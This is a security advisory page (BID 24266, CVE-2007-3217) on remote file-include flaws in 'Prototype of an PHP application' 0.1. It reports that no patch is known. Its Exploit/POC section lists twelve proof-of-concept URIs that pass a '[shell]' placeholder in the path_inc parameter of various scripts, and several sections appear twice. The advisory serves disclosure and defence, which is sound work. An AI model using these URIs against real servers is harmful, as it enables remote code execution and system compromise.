Prototype Of An PHP Application Multiple Remote File Include Vulnerabilities
BID:24266
Info
Prototype Of An PHP Application Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 24266 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3217 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 01 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | pito pito is credited with discovering these vulnerabilities. |
| Vulnerable: |
Prototype of an PHP application Prototype of an PHP application 0.1 |
| Not Vulnerable: | |
Discussion
Prototype Of An PHP Application Multiple Remote File Include Vulnerabilities
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
Exploit / POC
Prototype Of An PHP Application Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://example.com/script/gestion/index.php?path_inc=[shell]
http://example.com/script/ident/identification.php?path_inc=[shell]
http://example.com/script/ident/disconnect.php?path_inc=[shell]
http://example.com/script/ident/loginliste.php?path_inc=[shell]
http://example.com/script/ident/loginmodif.php?path_inc=[shell]
http://example.com/script//ident/index.php?path_inc=[shell]
http://example.com/script/ident/ident.inc.php?path_inc=[shell]
http://example.com/script/menu/menuprincipal.php?path_inc=[shell]
http://example.com/script/param/param.inc.php?path_inc=[shell]
http://example.com/script/index.php?path_inc=[shell]
http://example.com/script/common.inc.php?path_inc=[shell]
http://example.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell]
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://example.com/script/gestion/index.php?path_inc=[shell]
http://example.com/script/ident/identification.php?path_inc=[shell]
http://example.com/script/ident/disconnect.php?path_inc=[shell]
http://example.com/script/ident/loginliste.php?path_inc=[shell]
http://example.com/script/ident/loginmodif.php?path_inc=[shell]
http://example.com/script//ident/index.php?path_inc=[shell]
http://example.com/script/ident/ident.inc.php?path_inc=[shell]
http://example.com/script/menu/menuprincipal.php?path_inc=[shell]
http://example.com/script/param/param.inc.php?path_inc=[shell]
http://example.com/script/index.php?path_inc=[shell]
http://example.com/script/common.inc.php?path_inc=[shell]
http://example.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell]
Solution / Fix
Prototype Of An PHP Application Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Prototype Of An PHP Application Multiple Remote File Include Vulnerabilities
References:
References:
- Prototype of an PHP application Web Site (Prototype of an PHP application)
- Prototype of an PHP application ===> RFI ('pito pito'
)